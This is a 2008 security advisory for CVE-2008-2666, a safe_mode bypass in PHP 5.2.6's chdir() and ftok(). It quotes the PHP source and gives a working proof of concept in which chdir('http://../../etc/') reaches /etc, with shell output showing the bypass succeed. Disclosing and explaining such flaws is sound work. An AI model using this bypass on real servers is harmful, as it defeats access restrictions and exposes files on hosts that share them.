[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ] Author: Maksymilian Arciemowicz Date: - - Written: 10.05.2008 - - Public: 17.06.2008 CVE: CVE-2008-2666 CWE: CWE-264 Risk: Medium Affected Software: PHP 5.2.6 Vendor: http://www.php.net - --- 0.Description --- PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly. chdir ? Change directory SYNOPSIS: bool chdir ( string $directory ) http://pl.php.net/manual/en/function.chdir.php ftok ? Convert a pathname and a project identifier to a System V IPC key SYNOPSIS: int ftok ( string $pathname , string $proj ) http://pl.php.net/manual/en/function.ftok.php !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. WE WILL NOT LIST ALL VULNERABLE FUNCTIONS - --- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass --- Let's see to chdir() function - --- PHP_FUNCTION(chdir) { char *str; int ret, str_len; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) { RETURN_FALSE; } if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) { RETURN_FALSE; } ret = VCWD_CHDIR(str); if (ret != 0) { php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno); RETURN_FALSE; } RETURN_TRUE; } - --- str is beeing checked by safe_mode example: - --- Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8 - --- in current directory, we should create subdir "http:". => it is possible to create chdir("http://../../../../../../") and we are in / Why? TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC))) for str="http://../../../../../../" safe_mode will ignore all paths with http:// that same situation with ftok() function (and more) - ---EXAMPLE1--- cxib# cat /www/wufff.php <? echo getcwd()."\n"; chdir("/etc/"); echo getcwd()."\n"; ?> cxib# ls -la /www/wufff.php - -rw-r--r-- 1 www www 62 Jun 17 17:14 /www/wufff.php cxib# php /www/wufff.php /www Warning: chdir(): SAFE MODE Restriction in effect. The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3 /www cxib# - ---/EXAMPLE1--- - ---EXAMPLE2--- cxib# ls -la /www/wufff.php - -rw-r--r-- 1 www www 74 Jun 17 17:13 /www/wufff.php cxib# ls -la /www/http: total 8 drwxr-xr-x 2 www www 512 Jun 17 17:12 . drwxr-xr-x 19 www www 4608 Jun 17 17:13 .. cxib# cat /www/wufff.php <? echo getcwd()."\n"; chdir("http://../../etc/"); echo getcwd()."\n"; ?> cxib# php /www/wufff.php /www /etc cxib# - ---/EXAMPLE2--- !!! WARNING !!! IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. We WILL WILL NOT LISTS ALL VULNERABLE FUNCTIONS - --- 2. How to fix --- Do not use safe_mode as a main safety - --- 3. Contact --- Author: Maksymilian Arciemowicz